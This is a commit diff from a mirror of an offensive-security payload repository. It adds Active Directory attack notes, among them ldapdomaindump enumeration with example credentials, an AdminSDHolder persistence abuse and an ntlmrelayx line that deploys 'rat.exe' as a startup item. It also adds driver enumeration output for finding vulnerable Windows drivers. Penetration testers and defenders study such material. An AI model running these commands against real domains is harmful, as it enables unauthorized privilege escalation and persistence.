ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-01-18 17:28:49 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Driver Privilege Escalation

Browse Source
This commit is contained in:
Swissky 2020-07-13 15:00:36 +02:00
parent dd40ddd233
commit ca9326b5fc
2 changed files with 27 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
Methodology and Resources/Active Directory Attack.md
View File

@ -1061,7 +1061,17 @@ ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe
### Dangerous Built-in Groups Usage ### Dangerous Built-in Groups Usage
If you do not want modified ACLs to be overwrite every hour, you should change ACL template on the object "CN=AdminSDHolder,CN=System," or set "adminCount" attribute to 0 for the required objec If you do not want modified ACLs to be overwrite every hour, you should change ACL template on the object "CN=AdminSDHolder,CN=System," or set "adminCount" attribute to 0 for the required object.
> The AdminCount attribute is set to 1 automatically when a user is assigned to any privileged group, but it is never automatically unset when the user is removed from these group(s).
Find users with `AdminCount=1`.
```powershell
python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.100.20.1
jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json
```
AdminSDHolder AdminSDHolder
@ -1073,7 +1083,8 @@ or
``` ```
#### AdminSDHolder Abuse #### AdminSDHolder Abuse
if you modify the permissions of AdminSDHolder, that permission template will be pushed out to all protected accounts automatically by SDProp
If you modify the permissions of **AdminSDHolder**, that permission template will be pushed out to all protected accounts automatically by SDProp.
```powershell ```powershell
# right to reset password for toto using the account titi # right to reset password for toto using the account titi

15
Methodology and Resources/Windows - Privilege Escalation.md
View File

@ -748,8 +748,9 @@ Example: "Windows Help and Support" (Windows + F1), search for "command prompt",
Look for vuln drivers loaded, we often don't spend enough time looking at this: Look for vuln drivers loaded, we often don't spend enough time looking at this:
```powershell ```powershell
PS C:\Users\Swissky> driverquery.exe /fo table # https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery
PS C:\Users\Swissky> driverquery.exe /fo table
Module Name Display Name Driver Type Link Date Module Name Display Name Driver Type Link Date
============ ====================== ============= ====================== ============ ====================== ============= ======================
1394ohci 1394 OHCI Compliant Ho Kernel 12/10/2006 4:44:38 PM 1394ohci 1394 OHCI Compliant Ho Kernel 12/10/2006 4:44:38 PM
@ -762,6 +763,18 @@ AcpiPmi ACPI Power Meter Drive Kernel 11/19/2006 9:20:15 PM
acpitime ACPI Wake Alarm Driver Kernel 2/9/1974 7:10:30 AM acpitime ACPI Wake Alarm Driver Kernel 2/9/1974 7:10:30 AM
ADP80XX ADP80XX Kernel 4/9/2015 4:49:48 PM ADP80XX ADP80XX Kernel 4/9/2015 4:49:48 PM
<SNIP> <SNIP>
PS C:\Users\Swissky> DriverQuery.exe --no-msft
[+] Enumerating driver services...
[+] Checking file signatures...
Citrix USB Filter Driver
Service Name: ctxusbm
Path: C:\Windows\system32\DRIVERS\ctxusbm.sys
Version: 14.11.0.138
Creation Time (UTC): 17/05/2018 01:20:50
Cert Issuer: CN=Symantec Class 3 SHA256 Code Signing CA, OU=Symantec Trust Network, O=Symantec Corporation, C=US
Signer: CN="Citrix Systems, Inc.", OU=XenApp(ClientSHA256), O="Citrix Systems, Inc.", L=Fort Lauderdale, S=Florida, C=US
<SNIP>
``` ```
## EoP - Runas ## EoP - Runas